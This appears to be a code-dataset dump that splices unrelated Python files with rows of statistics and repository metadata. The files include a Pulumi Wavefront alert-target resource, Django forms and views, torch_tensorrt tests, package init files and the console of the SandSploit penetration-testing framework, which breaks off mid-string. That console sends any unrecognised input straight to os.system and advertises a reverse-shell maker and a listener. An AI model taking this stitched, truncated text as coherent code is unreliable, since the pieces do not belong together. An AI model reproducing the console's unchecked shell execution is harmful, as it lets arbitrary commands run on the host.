content_type: Optional[pulumi.Input[str]] = None,
custom_headers: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
email_subject: Optional[pulumi.Input[str]] = None,
is_html_content: Optional[pulumi.Input[bool]] = None,
method: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
recipient: Optional[pulumi.Input[str]] = None,
routes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertTargetRouteArgs']]]]] = None,
template: Optional[pulumi.Input[str]] = None,
triggers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AlertTargetArgs.__new__(AlertTargetArgs)
__props__.__dict__["content_type"] = content_type
__props__.__dict__["custom_headers"] = custom_headers
if description is None and not opts.urn:
raise TypeError("Missing required property 'description'")
__props__.__dict__["description"] = description
__props__.__dict__["email_subject"] = email_subject
__props__.__dict__["is_html_content"] = is_html_content
__props__.__dict__["method"] = method
__props__.__dict__["name"] = name
if recipient is None and not opts.urn:
raise TypeError("Missing required property 'recipient'")
__props__.__dict__["recipient"] = recipient
__props__.__dict__["routes"] = routes
if template is None and not opts.urn:
raise TypeError("Missing required property 'template'")
__props__.__dict__["template"] = template
if triggers is None and not opts.urn:
raise TypeError("Missing required property 'triggers'")
__props__.__dict__["triggers"] = triggers
__props__.__dict__["target_id"] = None
super(AlertTarget, __self__).__init__(
'wavefront:index/alertTarget:AlertTarget',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
content_type: Optional[pulumi.Input[str]] = None,
custom_headers: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
email_subject: Optional[pulumi.Input[str]] = None,
is_html_content: Optional[pulumi.Input[bool]] = None,
method: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
recipient: Optional[pulumi.Input[str]] = None,
routes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertTargetRouteArgs']]]]] = None,
target_id: Optional[pulumi.Input[str]] = None,
template: Optional[pulumi.Input[str]] = None,
triggers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'AlertTarget':
"""
Get an existing AlertTarget resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] content_type: The value of the `Content-Type` header of the webhook.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] custom_headers: A `string->string` map specifying the custom HTTP header key/value pairs that will be
sent in the requests with a method of `WEBHOOK`.
:param pulumi.Input[str] description: A description of this alert target.
:param pulumi.Input[str] email_subject: The subject title of an email notification target.
:param pulumi.Input[bool] is_html_content: Determine whether the email alert content is sent as HTML or text.
:param pulumi.Input[str] method: The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
:param pulumi.Input[str] name: The name of the alert target as it is displayed in Wavefront.
:param pulumi.Input[str] recipient: The endpoint for the notification target. `EMAIL`: email address. `PAGERDUTY`: PagerDuty
routing key. `WEBHOOK`: URL endpoint.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertTargetRouteArgs']]]] routes: List of routing targets that this alert target will notify. See Route
:param pulumi.Input[str] template: A mustache template that will form the body of the POST request, the email, and the PagerDuty summary.
:param pulumi.Input[Sequence[pulumi.Input[str]]] triggers: A list of occurrences on which this webhook will be fired. Valid values are `ALERT_OPENED`,
`ALERT_UPDATED`, `ALERT_RESOLVED`, `ALERT_MAINTENANCE`, `ALERT_SNOOZED`, `ALERT_NO_DATA`, `ALERT_NO_DATA_RESOLVED`, `ALERT_NO_DATA_MAINTENANCE`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _AlertTargetState.__new__(_AlertTargetState)
__props__.__dict__["content_type"] = content_type
__props__.__dict__["custom_headers"] = custom_headers
__props__.__dict__["description"] = description
__props__.__dict__["email_subject"] = email_subject
__props__.__dict__["is_html_content"] = is_html_content
__props__.__dict__["method"] = method
__props__.__dict__["name"] = name
__props__.__dict__["recipient"] = recipient
__props__.__dict__["routes"] = routes
__props__.__dict__["target_id"] = target_id
__props__.__dict__["template"] = template
__props__.__dict__["triggers"] = triggers
return AlertTarget(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="contentType")
def content_type(self) -> pulumi.Output[Optional[str]]:
"""
The value of the `Content-Type` header of the webhook.
"""
return pulumi.get(self, "content_type")
@property
@pulumi.getter(name="customHeaders")
def custom_headers(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A `string->string` map specifying the custom HTTP header key/value pairs that will be
sent in the requests with a method of `WEBHOOK`.
"""
return pulumi.get(self, "custom_headers")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
A description of this alert target.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="emailSubject")
def email_subject(self) -> pulumi.Output[Optional[str]]:
"""
The subject title of an email notification target.
"""
return pulumi.get(self, "email_subject")
@property
@pulumi.getter(name="isHtmlContent")
def is_html_content(self) -> pulumi.Output[Optional[bool]]:
"""
Determine whether the email alert content is sent as HTML or text.
"""
return pulumi.get(self, "is_html_content")
@property
@pulumi.getter
def method(self) -> pulumi.Output[Optional[str]]:
"""
The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
"""
return pulumi.get(self, "method")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the alert target as it is displayed in Wavefront.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def recipient(self) -> pulumi.Output[str]:
"""
The endpoint for the notification target. `EMAIL`: email address. `PAGERDUTY`: PagerDuty
routing key. `WEBHOOK`: URL endpoint.
"""
return pulumi.get(self, "recipient")
@property
@pulumi.getter
def routes(self) -> pulumi.Output[Optional[Sequence['outputs.AlertTargetRoute']]]:
"""
List of routing targets that this alert target will notify. See Route
"""
return pulumi.get(self, "routes")
@property
@pulumi.getter(name="targetId")
def target_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "target_id")
@property
@pulumi.getter
def template(self) -> pulumi.Output[str]:
"""
A mustache template that will form the body of the POST request, the email, and the PagerDuty summary.
"""
return pulumi.get(self, "template")
@property
@pulumi.getter
def triggers(self) -> pulumi.Output[Sequence[str]]:
"""
A list of occurrences on which this webhook will be fired. Valid values are `ALERT_OPENED`,
`ALERT_UPDATED`, `ALERT_RESOLVED`, `ALERT_MAINTENANCE`, `ALERT_SNOOZED`, `ALERT_NO_DATA`, `ALERT_NO_DATA_RESOLVED`, `ALERT_NO_DATA_MAINTENANCE`.
"""
return pulumi.get(self, "triggers")
| 44.131802 | 171 | 0.626599 | 4,134 | 36,497 | 5.358007 | 0.059507 | 0.094357 | 0.077743 | 0.057607 | 0.908488 | 0.886637 | 0.872009 | 0.851242 | 0.844244 | 0.829481 | 0 | 0.000037 | 0.264433 | 36,497 | 826 | 172 | 44.18523 | 0.825039 | 0.406335 | 0 | 0.756892 | 1 | 0 | 0.091894 | 0.003297 | 0 | 0 | 0 | 0 | 0 | 1 | 0.162907 | false | 0.002506 | 0.017544 | 0.005013 | 0.278195 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b1a6f984b5e780b6f21a01ce21297f5892df2fbd | 1,267 | py | Python | meal_plan_app/forms.py | JoelRice/Plan-Shop-Eat | 2646c918199e1c8857aeaaadacc4c656fb9f2170 | [
"MIT"
] | 2 | 2021-10-05T15:57:00.000Z | 2022-03-02T14:36:01.000Z | meal_plan_app/forms.py | JoelRice/Plan-Shop-Eat | 2646c918199e1c8857aeaaadacc4c656fb9f2170 | [
"MIT"
] | 17 | 2021-10-06T14:44:25.000Z | 2021-10-19T15:03:30.000Z | meal_plan_app/forms.py | JoelRice/Plan-Shop-Eat | 2646c918199e1c8857aeaaadacc4c656fb9f2170 | [
"MIT"
] | null | null | null | from django import forms
from recipe_app.models import Recipe
from meal_plan_app.models import MealPlan
class CreateMealPlanForm(forms.Form):
recipes = Recipe.objects.all()
plan_title = forms.CharField(max_length=50, required=True)
monday = forms.ModelMultipleChoiceField(
queryset=recipes,
required=False,
widget=forms.CheckboxSelectMultiple
)
tuesday = forms.ModelMultipleChoiceField(
queryset=recipes,
required=False,
widget=forms.CheckboxSelectMultiple
)
wednesday = forms.ModelMultipleChoiceField(
queryset=recipes,
required=False,
widget=forms.CheckboxSelectMultiple
)
thursday = forms.ModelMultipleChoiceField(
queryset=recipes,
required=False,
widget=forms.CheckboxSelectMultiple
)
friday = forms.ModelMultipleChoiceField(
queryset=recipes,
required=False,
widget=forms.CheckboxSelectMultiple
)
saturday = forms.ModelMultipleChoiceField(
queryset=recipes,
required=False,
widget=forms.CheckboxSelectMultiple
)
sunday = forms.ModelMultipleChoiceField(
queryset=recipes,
required=False,
widget=forms.CheckboxSelectMultiple
)
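The seven weekday fields above differ only in name. A hedged, Django-free sketch of how that repetition could be collapsed into a loop — `FieldStub`, `build_day_fields`, and the sample recipe list are hypothetical stand-ins; a real Django form would construct `forms.ModelMultipleChoiceField` with the same keyword arguments, e.g. inside `__init__` via `self.fields[day] = ...`:

```python
# FieldStub is a hypothetical stand-in for forms.ModelMultipleChoiceField;
# only the keyword arguments matter for this sketch.
class FieldStub:
    def __init__(self, queryset=None, required=True, widget=None):
        self.queryset = queryset
        self.required = required
        self.widget = widget

DAYS = ["monday", "tuesday", "wednesday", "thursday", "friday", "saturday", "sunday"]

def build_day_fields(recipes):
    # One checkbox-multiselect field per weekday, mirroring the form above.
    return {
        day: FieldStub(queryset=recipes, required=False, widget="CheckboxSelectMultiple")
        for day in DAYS
    }

fields = build_day_fields(recipes=["pasta", "soup"])
print(len(fields), fields["monday"].required)  # 7 False
```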
| 27.543478 | 62 | 0.689029 | 104 | 1,267 | 8.346154 | 0.336538 | 0.233871 | 0.298387 | 0.354839 | 0.725806 | 0.725806 | 0.725806 | 0.725806 | 0.725806 | 0 | 0 | 0.002081 | 0.241515 | 1,267 | 45 | 63 | 28.155556 | 0.901145 | 0 | 0 | 0.512195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.073171 | 0 | 0.317073 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
49599fb181f7349e86ce1bd18ccdb93972c1ba45 | 3,981 | py | Python | py/torch_tensorrt/fx/test/converters/acc_op/test_logical_or.py | hassan11196/Torch-TensorRT | a2d0d0e935bf223523a7c28d7814cdbd32f323b2 | [
"BSD-3-Clause"
] | null | null | null | py/torch_tensorrt/fx/test/converters/acc_op/test_logical_or.py | hassan11196/Torch-TensorRT | a2d0d0e935bf223523a7c28d7814cdbd32f323b2 | [
"BSD-3-Clause"
] | 1 | 2022-03-15T06:35:59.000Z | 2022-03-15T06:35:59.000Z | py/torch_tensorrt/fx/test/converters/acc_op/test_logical_or.py | hassan11196/Torch-TensorRT | a2d0d0e935bf223523a7c28d7814cdbd32f323b2 | [
"BSD-3-Clause"
] | null | null | null | import torch
import torch_tensorrt.fx.tracer.acc_tracer.acc_ops as acc_ops
from parameterized import parameterized
from torch.testing._internal.common_fx2trt import AccTestCase
from torch.testing._internal.common_utils import run_tests
class TestLogicalOrMethodSimpleConverter(AccTestCase):
@parameterized.expand(
[
("rand_2d_bool_bool", torch.randn(3, 4) > 0, torch.randn(3, 4) > 0),
("rand_3d_bool_bool", torch.randn(3, 4, 5) > 0, torch.randn(3, 4, 5) > 0),
(
"rand_4d_bool_bool",
torch.randn(3, 4, 5, 6) > 0,
torch.randn(3, 4, 5, 6) > 0,
),
("rand_2d_bool_single_bool", torch.randn(3, 4) > 0, torch.tensor(0) > 0),
(
"rand_2d_int_bool",
torch.randn(3, 4).to(torch.int),
torch.randn(3, 4) > 0,
),
(
"rand_2d_int_single_bool",
torch.randn(3, 4).to(torch.int),
torch.tensor(0) > 0,
),
]
)
def test_logical_or(self, _, input, other):
class LogicalOr(torch.nn.Module):
def forward(self, x, y):
return x.logical_or(y)
inputs = [
input,
other,
]
self.run_test(
LogicalOr(),
inputs,
expected_ops={acc_ops.logical_or},
test_implicit_batch_dim=False,
)
class TestLogicalOrFunctionSimpleConverter(AccTestCase):
@parameterized.expand(
[
("rand_2d_bool_bool", torch.randn(3, 4) > 0, torch.randn(3, 4) > 0),
("rand_3d_bool_bool", torch.randn(3, 4, 5) > 0, torch.randn(3, 4, 5) > 0),
(
"rand_4d_bool_bool",
torch.randn(3, 4, 5, 6) > 0,
torch.randn(3, 4, 5, 6) > 0,
),
("rand_2d_bool_single_bool", torch.randn(3, 4) > 0, torch.tensor(0) > 0),
(
"rand_2d_int_bool",
torch.randn(3, 4).to(torch.int),
torch.randn(3, 4) > 0,
),
(
"rand_2d_int_single_bool",
torch.randn(3, 4).to(torch.int),
torch.tensor(0) > 0,
),
]
)
def test_logical_or(self, _, input, other):
class LogicalOr(torch.nn.Module):
def forward(self, x, y):
return torch.logical_or(x, y)
inputs = [
input,
other,
]
self.run_test(
LogicalOr(),
inputs,
expected_ops={acc_ops.logical_or},
test_implicit_batch_dim=False,
)
class TestLogicalOrOperatorSimpleConverter(AccTestCase):
@parameterized.expand(
[
("rand_2d_bool_bool", torch.randn(3, 4) > 0, torch.randn(3, 4) > 0),
("rand_3d_bool_bool", torch.randn(3, 4, 5) > 0, torch.randn(3, 4, 5) > 0),
(
"rand_4d_bool_bool",
torch.randn(3, 4, 5, 6) > 0,
torch.randn(3, 4, 5, 6) > 0,
),
("rand_2d_bool_single_bool", torch.randn(3, 4) > 0, torch.tensor(0) > 0),
(
"rand_2d_int_bool",
torch.randn(3, 4).to(torch.int),
torch.randn(3, 4) > 0,
),
(
"rand_2d_int_single_bool",
torch.randn(3, 4).to(torch.int),
torch.tensor(0) > 0,
),
]
)
def test_logical_or(self, _, input, other):
class LogicalOr(torch.nn.Module):
def forward(self, x, y):
return x | y
inputs = [
input,
other,
]
self.run_test(
LogicalOr(),
inputs,
expected_ops={acc_ops.logical_or},
test_implicit_batch_dim=False,
)
if __name__ == "__main__":
run_tests()
| 30.623077 | 86 | 0.478523 | 459 | 3,981 | 3.910675 | 0.132898 | 0.167131 | 0.183844 | 0.200557 | 0.837883 | 0.804457 | 0.804457 | 0.804457 | 0.804457 | 0.804457 | 0 | 0.055256 | 0.395378 | 3,981 | 129 | 87 | 30.860465 | 0.690486 | 0 | 0 | 0.686441 | 0 | 0 | 0.087918 | 0.035418 | 0 | 0 | 0 | 0 | 0 | 1 | 0.050847 | false | 0 | 0.042373 | 0.025424 | 0.169492 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
498a4518eda369cec7c244f5aad2519fa9734546 | 208 | py | Python | ext/opentelemetry-ext-django/tests/views.py | vmihailenco/opentelemetry-python | 0a9eba3bb62f4ddf686b55b68286979a5ec84de5 | [
"Apache-2.0"
] | null | null | null | ext/opentelemetry-ext-django/tests/views.py | vmihailenco/opentelemetry-python | 0a9eba3bb62f4ddf686b55b68286979a5ec84de5 | [
"Apache-2.0"
] | null | null | null | ext/opentelemetry-ext-django/tests/views.py | vmihailenco/opentelemetry-python | 0a9eba3bb62f4ddf686b55b68286979a5ec84de5 | [
"Apache-2.0"
] | null | null | null | from django.http import HttpResponse
def traced(request): # pylint: disable=unused-argument
return HttpResponse()
def error(request): # pylint: disable=unused-argument
raise ValueError("error")
| 20.8 | 55 | 0.745192 | 24 | 208 | 6.458333 | 0.666667 | 0.193548 | 0.258065 | 0.335484 | 0.43871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 208 | 9 | 56 | 23.111111 | 0.880682 | 0.302885 | 0 | 0 | 0 | 0 | 0.035211 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
499a6f130ca173aca52488c7b0ac4a44d0a4e4e0 | 209 | py | Python | taxdata/puf/__init__.py | jdebacker/taxdata | c32d401a10a6c8f6e889d87c6cc72fd4338017b2 | [
"CC0-1.0"
] | 12 | 2019-02-07T14:06:28.000Z | 2021-12-04T19:19:50.000Z | taxdata/puf/__init__.py | jdebacker/taxdata | c32d401a10a6c8f6e889d87c6cc72fd4338017b2 | [
"CC0-1.0"
] | 230 | 2015-10-20T18:38:10.000Z | 2018-12-05T16:04:04.000Z | taxdata/puf/__init__.py | jdebacker/taxdata | c32d401a10a6c8f6e889d87c6cc72fd4338017b2 | [
"CC0-1.0"
] | 19 | 2015-12-21T18:25:11.000Z | 2018-11-10T16:53:38.000Z | # flake8: noqa
from taxdata.puf.preppuf import preppuf
from taxdata.puf import impute_itmexp
from taxdata.puf import impute_pencon
from taxdata.puf.finalprep import finalprep
from taxdata.puf import constants
| 29.857143 | 43 | 0.84689 | 31 | 209 | 5.645161 | 0.387097 | 0.314286 | 0.4 | 0.342857 | 0.297143 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005376 | 0.110048 | 209 | 6 | 44 | 34.833333 | 0.935484 | 0.057416 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
b8f54387c84d14ce125549864549254c82b66305 | 150 | py | Python | pen_plots/util/__init__.py | DiddiZ/pen-plots | 422c219f1682693f8f373308ff7f9f0f58eeff56 | [
"MIT"
] | null | null | null | pen_plots/util/__init__.py | DiddiZ/pen-plots | 422c219f1682693f8f373308ff7f9f0f58eeff56 | [
"MIT"
] | null | null | null | pen_plots/util/__init__.py | DiddiZ/pen-plots | 422c219f1682693f8f373308ff7f9f0f58eeff56 | [
"MIT"
] | null | null | null | from pen_plots.util.download import download
from pen_plots.util.matplotlib import show_strokes
from pen_plots.util.timer import MultiTimer, Timer
| 37.5 | 51 | 0.846667 | 23 | 150 | 5.347826 | 0.478261 | 0.170732 | 0.292683 | 0.390244 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106667 | 150 | 3 | 52 | 50 | 0.91791 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
621095c92b28740bb9690a925fbd2e1b30cc6153 | 70 | py | Python | facebook/tests/__init__.py | fabiangermann/django-facebook-graph | e63039c94a50f293ae79e8ecda24a9c7d1b61c68 | [
"Apache-2.0"
] | 1 | 2015-09-24T00:36:28.000Z | 2015-09-24T00:36:28.000Z | facebook/tests/__init__.py | fabiangermann/django-facebook-graph | e63039c94a50f293ae79e8ecda24a9c7d1b61c68 | [
"Apache-2.0"
] | null | null | null | facebook/tests/__init__.py | fabiangermann/django-facebook-graph | e63039c94a50f293ae79e8ecda24a9c7d1b61c68 | [
"Apache-2.0"
] | null | null | null | from facebook.tests.utils import *
from facebook.tests.users import *
| 23.333333 | 34 | 0.8 | 10 | 70 | 5.6 | 0.6 | 0.428571 | 0.607143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 70 | 2 | 35 | 35 | 0.903226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
622146ec1e592c0dd2863464bedbd32519b6c10d | 328 | py | Python | tests2/exception.py | Nlioxa/QA-Labs | 211cbfb9e8be50e8192d4097c8c4f3f71c9bb59b | [
"MIT"
] | null | null | null | tests2/exception.py | Nlioxa/QA-Labs | 211cbfb9e8be50e8192d4097c8c4f3f71c9bb59b | [
"MIT"
] | null | null | null | tests2/exception.py | Nlioxa/QA-Labs | 211cbfb9e8be50e8192d4097c8c4f3f71c9bb59b | [
"MIT"
] | null | null | null | class TrueException(Exception):
def __init__(self, message="message"):
self.message = message
def printMessage(self):
print(self.message)
class FalseException(Exception):
def __init__(self, message="message"):
self.message = message
def printMessage(self):
print(self.message) | 23.428571 | 42 | 0.667683 | 34 | 328 | 6.205882 | 0.294118 | 0.312796 | 0.341232 | 0.189573 | 0.824645 | 0.824645 | 0.824645 | 0.824645 | 0.824645 | 0.824645 | 0 | 0 | 0.222561 | 328 | 14 | 43 | 23.428571 | 0.827451 | 0 | 0 | 0.8 | 0 | 0 | 0.042553 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0 | 0.6 | 0.4 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 12 |
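A minimal usage sketch for the two classes above (the driver at the bottom is illustrative; the classes are redefined so the snippet is self-contained):

```python
# Redefined here so the sketch is self-contained; identical to the classes above.
class TrueException(Exception):
    def __init__(self, message="message"):
        self.message = message
    def printMessage(self):
        print(self.message)

class FalseException(Exception):
    def __init__(self, message="message"):
        self.message = message
    def printMessage(self):
        print(self.message)

# Hypothetical driver: raise one variant and report it via printMessage().
try:
    raise TrueException("condition held")
except TrueException as exc:
    exc.printMessage()  # prints "condition held"
```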
62308050e11f160f5c2f6199cb1515ec267f83f4 | 103 | py | Python | ips/ip/spi_slave_0_base/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | ips/ip/spi_slave_0_base/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | ips/ip/spi_slave_0_base/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | from spi_slave_0_base_partial import get_ip_name
from spi_slave_0_base_partial import SPI_SLAVE_0_BASE
| 34.333333 | 53 | 0.92233 | 21 | 103 | 3.904762 | 0.47619 | 0.292683 | 0.329268 | 0.47561 | 0.731707 | 0.731707 | 0.731707 | 0 | 0 | 0 | 0 | 0.031579 | 0.07767 | 103 | 2 | 54 | 51.5 | 0.831579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
627ebd54f923a8ec58a973e6e767db2c4d5dd42b | 8,455 | py | Python | project/lib/console.py | invisble-rabbit/sandsploit | ebbf9439396e668c08ad96f50fff37cddbca1b18 | [
"Apache-2.0"
] | 1 | 2020-02-26T13:14:37.000Z | 2020-02-26T13:14:37.000Z | project/lib/console.py | invisble-rabbit/sandsploit | ebbf9439396e668c08ad96f50fff37cddbca1b18 | [
"Apache-2.0"
] | null | null | null | project/lib/console.py | invisble-rabbit/sandsploit | ebbf9439396e668c08ad96f50fff37cddbca1b18 | [
"Apache-2.0"
] | null | null | null | #CopyRight Apache-2.0
#Powered By Python 3.X
#Author : @Aμιρ-0x0 (AMJ)
#import libs
import os, sys, readline, re, platform, signal
from colorama import Fore
from os.path import expanduser
from lib.banner import banner
from lib.update import update
from lib.version import version
from lib.completor import *
from lib.upgrade import upgrade
from core.listener import *
from core.rsmaker import RSMaker
from datetime import datetime
##################################################
def controlc_signal(signal,frame):
print ("\nInterrupt: use the 'exit' command to quit")
#Console Function
def console():
path = None
toolpart =None
#File lists Function
def mp(path):
for root,dirs,files in os.walk(path):
for f in files:
print (f)
#list Function
def list():
print ("\nTools\n===============")
mp(path)
try:
while True:
signal.signal(signal.SIGINT,controlc_signal)
#Get PWD
signal.signal(signal.SIGINT,controlc_signal)
getcwd = os.getcwd()
getdir = getcwd.split("/")
pwd = getdir[-1]
#Get LocalHost Name
plat = platform.node()
#Nothing Special :)
point = "→"
#Check Tools Part Directory
if path == None:
None
else:
pth = path.split("/")
toolpart = pth[-2]
#Prompt
option = input (Fore.RESET+"\n[SSF@%s](%s){%s} %s "%(plat,pwd,toolpart,point))
option2 = option.split(" ")
#Conditions
if option2[0] == "cd":
def cd(path):
os.chdir(os.path.expanduser(path))
try:
cd(option2[1])
except:
print ("ERROR: No such file or directory: ",option2[1])
elif option2[0] == 'run':
try:
if option == "run":
print ("enter help to see how to use this command")
else:
run = option.split("run ")[1]
run2 = path+run
#exec(open(run2).read())
exst = os.path.isfile(run2)
if exst:
os.system(run2)
else :
print ("Cannot find executable file")
except:
print ("Error !!!")
elif option2[0] == 'use':
try:
check = "/opt/sandsploit/module/%s/"%option2[1]
exist = os.path.isdir(check)
if exist:
path = check
else:
print ("Part not Found")
except:
print ("Part Not Found")
elif option == 'list':
if path == None:
print("\nTools\n===============")
print ("Tools NotFound")
else:
list()
elif option == 'help':
#Menu
print ('''
Command Description
======== ============
banner Change Banner
bash Run Bash Shell
list List of tools for each section
listener Sniffing Port
python               Interactive Shell (Debugging Purposes)
RSMaker Make Reverse Shell For Desktop Operating Systems
run Run Tools In modules
use Interact With Different Parts of Penetration Testing Tools
version Show version of SandSploit
upgrade              Full Upgrade Frameworks
update Update Exploits & Scripts Parts
exit Exit From SSF
''')
elif option == "version":
version()
elif option == "update":
update()
elif option == "upgrade":
upgrade()
elif option == "banner":
banner()
elif option == "RSMaker":
RSMaker()
elif option == "listener":
listener()
elif option == "exit":
sys.exit()
else:
os.system(option)
except EnvironmentError:
print ("\nUnknown Error......")
print ("Enter 'help' to show commands....")
console()
def termux_console():
path = None
toolpart =None
#File lists Function
def mp(path):
for root,dirs,files in os.walk(path):
for f in files:
print (f)
#list Function
def list():
print ("\nTools\n===============")
mp(path)
try:
while True:
signal.signal(signal.SIGINT,controlc_signal)
#Get PWD
signal.signal(signal.SIGINT,controlc_signal)
getcwd = os.getcwd()
getdir = getcwd.split("/")
pwd = getdir[-1]
#Get LocalHost Name
plat = platform.node()
#Nothing Special :)
point = "→"
#Check Tools Part Directory
if path == None:
None
else:
pth = path.split("/")
toolpart = pth[-2]
#Prompt
option = input (Fore.RESET+"\n[SSF@%s](%s){%s} %s "%(plat,pwd,toolpart,point))
option2 = option.split(" ")
#Conditions
if option2[0] == "cd":
def cd(path):
os.chdir(os.path.expanduser(path))
try:
cd(option2[1])
except:
print ("ERROR: No such file or directory: ",option2[1])
elif option2[0] == 'run':
try:
if option == "run":
print ("enter help to see how to use this command")
else:
run = option.split("run ")[1]
run2 = path+run
#exec(open(run2).read())
exst = os.path.isfile(run2)
if exst:
os.system(run2)
else :
print ("Cannot find executable file")
except:
print ("Error !!!")
elif option2[0] == 'use':
try:
check = "/data/data/com.termux/files/usr/opt/sandsploit/module/%s/"%option2[1]
exist = os.path.isdir(check)
if exist:
path = check
else:
print ("Part not Found")
except:
print ("Part Not Found")
elif option == 'list':
if path == None:
print("\nTools\n===============")
print ("Tools NotFound")
else:
list()
elif option == 'help':
#Menu
print ('''
